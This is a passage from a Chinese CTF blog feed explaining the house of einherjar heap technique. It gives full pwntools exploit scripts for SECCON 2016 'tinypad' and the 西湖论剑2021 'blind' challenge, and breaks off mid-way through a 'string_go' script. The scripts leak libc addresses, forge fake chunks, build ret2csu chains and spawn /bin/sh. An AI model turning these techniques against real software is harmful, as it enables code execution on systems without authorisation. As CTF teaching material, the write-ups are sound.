list&quot;</span>, P, AV);  \</span><br><span class="line">    <span class="keyword">else</span> &#123;      \</span><br><span class="line">        FD-&gt;bk = BK;      \</span><br><span class="line">        BK-&gt;fd = FD;      \</span><br><span class="line">        <span class="keyword">if</span> (!in_smallbin_range (P-&gt;size)      \</span><br><span class="line">            &amp;&amp; __builtin_expect (P-&gt;fd_nextsize != <span class="literal">NULL</span>, <span class="number">0</span>)) &#123;      \</span><br><span class="line">    <span class="keyword">if</span> (__builtin_expect (P-&gt;fd_nextsize-&gt;bk_nextsize != P, <span class="number">0</span>)      \</span><br><span class="line">|| __builtin_expect (P-&gt;bk_nextsize-&gt;fd_nextsize != P, <span class="number">0</span>))    \</span><br><span class="line">      malloc_printerr (check_action,      \</span><br><span class="line">       <span class="string">&quot;corrupted double-linked list (not small)&quot;</span>,    \</span><br><span class="line">       P, AV);      \</span><br><span class="line">            <span class="keyword">if</span> (FD-&gt;fd_nextsize == <span class="literal">NULL</span>) &#123;      \</span><br><span class="line">                <span class="keyword">if</span> (P-&gt;fd_nextsize == P)      \</span><br><span class="line">                  FD-&gt;fd_nextsize = FD-&gt;bk_nextsize = FD;      \</span><br><span class="line">                <span class="keyword">else</span> &#123;      \</span><br><span class="line">                    FD-&gt;fd_nextsize = P-&gt;fd_nextsize;      \</span><br><span class="line">                    FD-&gt;bk_nextsize = P-&gt;bk_nextsize;      \</span><br><span class="line">                    P-&gt;fd_nextsize-&gt;bk_nextsize = FD;      \</span><br><span class="line">                    P-&gt;bk_nextsize-&gt;fd_nextsize = FD;      \</span><br><span class="line">                  &#125;      \</span><br><span class="line">              &#125; <span class="keyword">else</span> &#123;      \</span><br><span class="line">                P-&gt;fd_nextsize-&gt;bk_nextsize = P-&gt;bk_nextsize;      \</span><br><span class="line">                P-&gt;bk_nextsize-&gt;fd_nextsize = P-&gt;fd_nextsize;      \</span><br><span class="line">              &#125;      \</span><br><span class="line">          &#125;      \</span><br><span class="line">      &#125;      \</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h2 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h2><ul><li>利用堆溢出或者off-by-null漏洞能修改高地址的 chunk 的 <code>prev_inuse</code> 字段。（栈溢出/off-by-one）</li><li>后向（向低地址）合并时，新的 chunk 的位置取决于 <code>chunk_at_offset(p, -((long) prevsize))</code> 。</li><li><code>fake_chunk</code> 的 <code>fd</code> 和 <code>bk</code> 为 <code>fake_chunk</code> 的地址，以绕过 unlink检测。</li><li>我们需要计算目的 chunk 与 p1 地址之间的差，所以需要泄漏地址。</li><li>我们需要在目的 chunk 附近构造相应的 fake chunk，从而绕过 unlink 的检测。</li></ul><h1 id="2016-Seccon-tinypad"><a href="#2016-Seccon-tinypad" class="headerlink" title="2016 Seccon tinypad"></a>2016 Seccon tinypad</h1><p>程序存在 <code>off-by-null</code> 漏洞。</p><h2 id="exp详解"><a href="#exp详解" class="headerlink" title="exp详解"></a>exp详解</h2><p>leak 地址部分就不详细分析了，从 <code>house of einherjar</code> 分配堆块开始分析。</p><h3 id="1-堆块分配"><a href="#1-堆块分配" class="headerlink" title="1.堆块分配"></a>1.堆块分配</h3><p>chunk1 用于修改 chunk2 的 prev_size 段以及 prev_inuse 。</p><p>chunk3、chunk4 主要用于填充程序自定义的缓冲区域。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0x18</span>,<span class="string">&#x27;a&#x27;</span>*<span class="number">0x18</span>)<span class="comment">#1</span></span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">&#x27;b&#x27;</span>*<span class="number">0xf8</span> + <span class="string">&#x27;\x11&#x27;</span>)<span class="comment">#2</span></span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">&#x27;c&#x27;</span>*<span class="number">0xf8</span>)<span class="comment">#3</span></span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">&#x27;d&#x27;</span>*<span class="number">0xf8</span>)<span class="comment">#4</span></span><br></pre></td></tr></table></figure><p>利用分为两个部分，第一是在 target_addr 处（选择在 tinypad+0x20 处）构造 fake_chunk 。第二是写 chunk2 的 prev_size 段以及 prev_inuse 。</p><h3 id="2-构造-fake-chunk"><a href="#2-构造-fake-chunk" class="headerlink" title="2.构造 fake_chunk"></a>2.构造 fake_chunk</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x20</span></span><br><span class="line">payload += p64(<span class="number">0</span>) + p64(<span class="number">0x101</span>)</span><br><span class="line">payload += p64(fd) + p64(bk)</span><br><span class="line">edit(<span class="number">3</span>,payload)</span><br></pre></td></tr></table></figure><h3 id="3-写-chunk2-字段"><a href="#3-写-chunk2-字段" class="headerlink" title="3.写 chunk2 字段"></a>3.写 chunk2 字段</h3><p>在此之前我们需要计算出 chunk2 到 tinypad+0x20 处的距离</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">tinypad = <span class="number">0x602040</span></span><br><span class="line">fake_chunk_addr = tinypad + <span class="number">0x20</span></span><br><span class="line">fd = fake_chunk_addr</span><br><span class="line">bk = fake_chunk_addr</span><br><span class="line">offset = chunk2 - fake_chunk_addr</span><br></pre></td></tr></table></figure><p>通过程序strcpy写入构造的 chunk2 字段，再 free(2)。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x14</span> + p64(offset)</span><br><span class="line">edit(<span class="number">1</span>,payload)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>):</span><br><span class="line">    payload = <span class="string">&#x27;a&#x27;</span>*(<span class="number">0x13</span>-i) + p64(offset)</span><br><span class="line">    edit(<span class="number">1</span>,payload)</span><br><span class="line">free(<span class="number">2</span>)</span><br></pre></td></tr></table></figure><p><img src="/article/house%20of%20einherjar/image-20211130105542360.png" alt="image-20211130105542360"></p><p>下一个申请的 0xf0 大小的堆块就在 0x602060 处。</p><p><img src="/article/house%20of%20einherjar/image-20211130105718209.png" alt="image-20211130105718209"></p><h3 id="4-修复-fake-chunk"><a href="#4-修复-fake-chunk" class="headerlink" title="4.修复 fake_chunk"></a>4.修复 fake_chunk</h3><p>在申请堆块之前我们需要修复一下 fake_chunk 的 size 、fd 和 bk，</p><p>fd 和 bk 必须是 unsorted bin</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">&#x27;b&#x27;</span>*<span class="number">0x20</span> </span><br><span class="line">payload +=  p64(<span class="number">0</span>) + p64(<span class="number">0x101</span>)</span><br><span class="line">payload +=  p64(malloc_hook+<span class="number">0x10</span>+<span class="number">88</span>)*<span class="number">2</span></span><br><span class="line">edit(<span class="number">4</span>,payload)</span><br></pre></td></tr></table></figure><p>后写 payload 修改 tinypad_array 的指针</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">&#x27;f&#x27;</span> * (<span class="number">0x100</span> - <span class="number">0x20</span> - <span class="number">0x10</span>) + p64(<span class="number">0x18</span>) + p64(environ) + p64(<span class="number">0xf0</span>) + p64(<span class="number">0x602148</span>)</span><br><span class="line">add(<span class="number">0xf8</span>,payload)</span><br></pre></td></tr></table></figure><h3 id="5-修改-main-函数的返回地址为-one-gadget-地址获取-shell"><a href="#5-修改-main-函数的返回地址为-one-gadget-地址获取-shell" class="headerlink" title="5.修改 main 函数的返回地址为 one_gadget 地址获取 shell"></a>5.修改 main 函数的返回地址为 one_gadget 地址获取 shell</h3><p>首先是在栈上找到 0x7f9afca72840 (__libc_start_main+240)，后计算出偏移</p><p><img src="/article/house%20of%20einherjar/image-20211130120204305.png" alt="image-20211130120204305"></p><p><img src="/article/house%20of%20einherjar/image-20211130120604059.png" alt="image-20211130120604059"></p><p><img src="/article/house%20of%20einherjar/image-20211130120609788.png" alt="image-20211130120609788"></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">offset = environ_addr - (__libc_start_main+<span class="number">240</span>)</span><br><span class="line"></span><br><span class="line">main_ret = environ_addr - offset</span><br></pre></td></tr></table></figure><p>chunk2 -&gt; chunk1 ，利用 chunk2 修改 chunk1 指向 main_ret ，chunk1 修改 main_ret 为one_gadget</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">edit(<span class="number">2</span>,p64(main_ret))</span><br></pre></td></tr></table></figure><p><img src="/article/house%20of%20einherjar/image-20211130121532715.png" alt="image-20211130121532715"></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">edit(<span class="number">1</span>,p64(one_gadget))</span><br></pre></td></tr></table></figure><p><img src="/article/house%20of%20einherjar/image-20211130121818300.png" alt="image-20211130121818300"></p><h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;i386&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">&#x27;tinypad&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line">    p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">20002</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span class="number">12345</span>)</span><br><span class="line">    <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;(CMD)&gt;&gt;&gt; &#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,content</span>):</span></span><br><span class="line">    cmd(<span class="string">&#x27;A&#x27;</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;(SIZE)&gt;&gt;&gt; &#x27;</span>,<span class="built_in">str</span>(size))</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;(CONTENT)&gt;&gt;&gt; &#x27;</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line">    cmd(<span class="string">&#x27;E&#x27;</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;(INDEX)&gt;&gt;&gt; &#x27;</span>,<span class="built_in">str</span>(index))   </span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;(CONTENT)&gt;&gt;&gt; &#x27;</span>,content)  </span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;(Y/n)&gt;&gt;&gt; &#x27;</span>,<span class="string">&#x27;Y&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line">    cmd(<span class="string">&#x27;D&#x27;</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;(INDEX)&gt;&gt;&gt; &#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="comment"># BEGIN leak</span></span><br><span class="line">add(<span class="number">0x70</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">add(<span class="number">0x70</span>,<span class="string">&#x27;b&#x27;</span>)</span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">&#x27;c&#x27;</span>)</span><br><span class="line"></span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27; # CONTENT: &#x27;</span>)</span><br><span class="line">chunk1 = u64(p.recv(<span class="number">4</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>)) - <span class="number">0x80</span></span><br><span class="line">chunk2 = chunk1 + <span class="number">0x20</span></span><br><span class="line">log.success(<span class="string">&#x27;chunk1: &#x27;</span> + <span class="built_in">hex</span>(chunk1))</span><br><span class="line"></span><br><span class="line">free(<span class="number">3</span>)</span><br><span class="line">malloc_hook = u64(p.recvuntil(<span class="string">&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>)) - <span class="number">0x10</span> - <span class="number">88</span> </span><br><span class="line">log.success(<span class="string">&#x27;malloc_hook: &#x27;</span> + <span class="built_in">hex</span>(malloc_hook))</span><br><span class="line">libc_base = malloc_hook - libc.sym[<span class="string">&#x27;__malloc_hook&#x27;</span>]</span><br><span class="line">system_addr = libc_base + libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">free_hook = libc_base + libc.sym[<span class="string">&#x27;__free_hook&#x27;</span>]</span><br><span class="line">environ = libc_base + libc.sym[<span class="string">&#x27;__environ&#x27;</span>]</span><br><span class="line">log.success(<span class="string">&#x27;libc_base: &#x27;</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line">log.success(<span class="string">&#x27;system_addr: &#x27;</span> + <span class="built_in">hex</span>(system_addr))</span><br><span class="line">log.success(<span class="string">&#x27;free_hook: &#x27;</span> + <span class="built_in">hex</span>(free_hook))</span><br><span class="line">log.success(<span class="string">&#x27;environ: &#x27;</span> + <span class="built_in">hex</span>(environ))</span><br><span class="line"><span class="comment"># END leak</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x18</span>,<span class="string">&#x27;a&#x27;</span>*<span class="number">0x18</span>)</span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">&#x27;b&#x27;</span>*<span class="number">0xf8</span> + <span class="string">&#x27;\x11&#x27;</span>)</span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">&#x27;c&#x27;</span>*<span class="number">0xf8</span>)</span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">&#x27;d&#x27;</span>*<span class="number">0xf8</span>)</span><br><span class="line"></span><br><span class="line">tinypad = <span class="number">0x602040</span></span><br><span class="line">fake_chunk_addr = tinypad + <span class="number">0x20</span></span><br><span class="line">fd = fake_chunk_addr</span><br><span class="line">bk = fake_chunk_addr</span><br><span class="line">offset = chunk2 - fake_chunk_addr</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x20</span></span><br><span class="line">payload += p64(<span class="number">0</span>) + p64(<span class="number">0x101</span>)</span><br><span class="line">payload += p64(fd) + p64(bk)</span><br><span class="line">edit(<span class="number">3</span>,payload)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x14</span> + p64(offset)</span><br><span class="line">edit(<span class="number">1</span>,payload)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>):</span><br><span class="line">    payload = <span class="string">&#x27;a&#x27;</span>*(<span class="number">0x13</span>-i) + p64(offset)</span><br><span class="line">    edit(<span class="number">1</span>,payload)</span><br><span class="line"></span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;b&#x27;</span>*<span class="number">0x20</span> </span><br><span class="line">payload +=  p64(<span class="number">0</span>) + p64(<span class="number">0x101</span>)</span><br><span class="line">payload +=  p64(malloc_hook+<span class="number">0x10</span>+<span class="number">88</span>)*<span class="number">2</span></span><br><span class="line">edit(<span class="number">4</span>,payload)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;f&#x27;</span> * (<span class="number">0x100</span> - <span class="number">0x20</span> - <span class="number">0x10</span>) + p64(<span class="number">0x18</span>) + p64(environ) + p64(<span class="number">0xf0</span>) + p64(<span class="number">0x602148</span>)</span><br><span class="line">add(<span class="number">0xf8</span>,payload)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&#x27;# CONTENT: &#x27;</span>)</span><br><span class="line">environ_addr = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line">main_ret = environ_addr - <span class="number">0xf0</span></span><br><span class="line">one_gadget = libc_base + <span class="number">0x45226</span></span><br><span class="line">log.success(<span class="string">&#x27;environ_addr: &#x27;</span> + <span class="built_in">hex</span>(environ_addr))</span><br><span class="line">log.success(<span class="string">&#x27;main_ret: &#x27;</span> + <span class="built_in">hex</span>(main_ret))</span><br><span class="line"></span><br><span class="line">edit(<span class="number">2</span>,p64(main_ret))</span><br><span class="line">edit(<span class="number">1</span>,p64(one_gadget))</span><br><span class="line"></span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>]]></content>
    
    
    <summary type="html">house of einherjar</summary>
    
    
    
    <category term="笔记" scheme="https://trick.ink/categories/%E7%AC%94%E8%AE%B0/"/>
    
    
  </entry>
  
  <entry>
    <title>西湖论剑2021</title>
    <link href="https://trick.ink/article/xhlj2021/"/>
    <id>https://trick.ink/article/xhlj2021/</id>
    <published>2021-11-22T12:04:29.000Z</published>
    <updated>2023-02-09T18:03:07.044Z</updated>
    
    <content type="html"><![CDATA[<h1 id="西湖论剑2021"><a href="#西湖论剑2021" class="headerlink" title="西湖论剑2021"></a>西湖论剑2021</h1><!-- 文章页 配置 --><h1 id="blind"><a href="#blind" class="headerlink" title="blind"></a>blind</h1><h2 id="函数中的syscall调用"><a href="#函数中的syscall调用" class="headerlink" title="函数中的syscall调用"></a>函数中的syscall调用</h2><p><img src="/article/xhlj2021/image-20211123122541089.png" alt="image-20211123122541089"></p><p><img src="/article/xhlj2021/image-20211123122731084.png" alt="image-20211123122731084"></p><p>栈溢出，alarm@got调用了syscall，并且PIE没有开启，只要修改最后一个字节即可调用syscall。</p><p>/bin/sh写在bss段上，并且长度为59，因为read函数的返回值为读取数据的长度，并且存放在 rax 寄存器中，调用exec。</p><h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;i386&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">&#x27;blind&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line">    p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">20002</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span class="number">12345</span>)</span><br><span class="line">    <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">read_got = elf.got[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">alarm_got = elf.got[<span class="string">&#x27;alarm&#x27;</span>]</span><br><span class="line">bss_addr = <span class="number">0x601088</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">csu</span>(<span class="params">function,rdi,rsi,rdx</span>):</span></span><br><span class="line">    payload = p64(<span class="number">0x4007Ba</span>)</span><br><span class="line">    payload += p64(<span class="number">0</span>) + p64(<span class="number">1</span>) + p64(function) + p64(rdx) + p64(rsi) + p64(rdi)</span><br><span class="line">    payload += p64(<span class="number">0x4007A0</span>) + <span class="string">&#x27;a&#x27;</span>*<span class="number">56</span></span><br><span class="line">    <span class="keyword">return</span> payload</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line">sleep(<span class="number">3</span>)</span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x58</span> </span><br><span class="line">payload += csu(read_got,<span class="number">0</span>,alarm_got,<span class="number">1</span>)</span><br><span class="line">payload += csu(read_got,<span class="number">0</span>,<span class="number">0x601088</span>,<span class="number">59</span>)</span><br><span class="line">payload += csu(alarm_got,<span class="number">0x601088</span>,<span class="number">0</span>,<span class="number">0</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">sleep(<span class="number">0.5</span>)</span><br><span class="line">p.send(<span class="string">&#x27;\x85&#x27;</span>)</span><br><span class="line">sleep(<span class="number">0.5</span>)</span><br><span class="line">p.send(<span class="string">&#x27;/bin/sh\x00&#x27;</span>.ljust(<span class="number">59</span>,<span class="string">&#x27;a&#x27;</span>))</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h1 id="string-go"><a href="#string-go" class="headerlink" title="string_go"></a>string_go</h1><h2 id="代码审计"><a href="#代码审计" class="headerlink" title="代码审计"></a>代码审计</h2><p>calc 函数计算结果为 3 时进入 lative_func 函数。</p><p>当 v7 为负数的时候会输出栈上的数据。</p><p><img src="/article/xhlj2021/image-20211124184458816.png" alt="image-20211124184458816"></p><h2 id="exp-1"><a href="#exp-1" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;i386&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">&#x27;string_go&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line">    p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">20002</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span 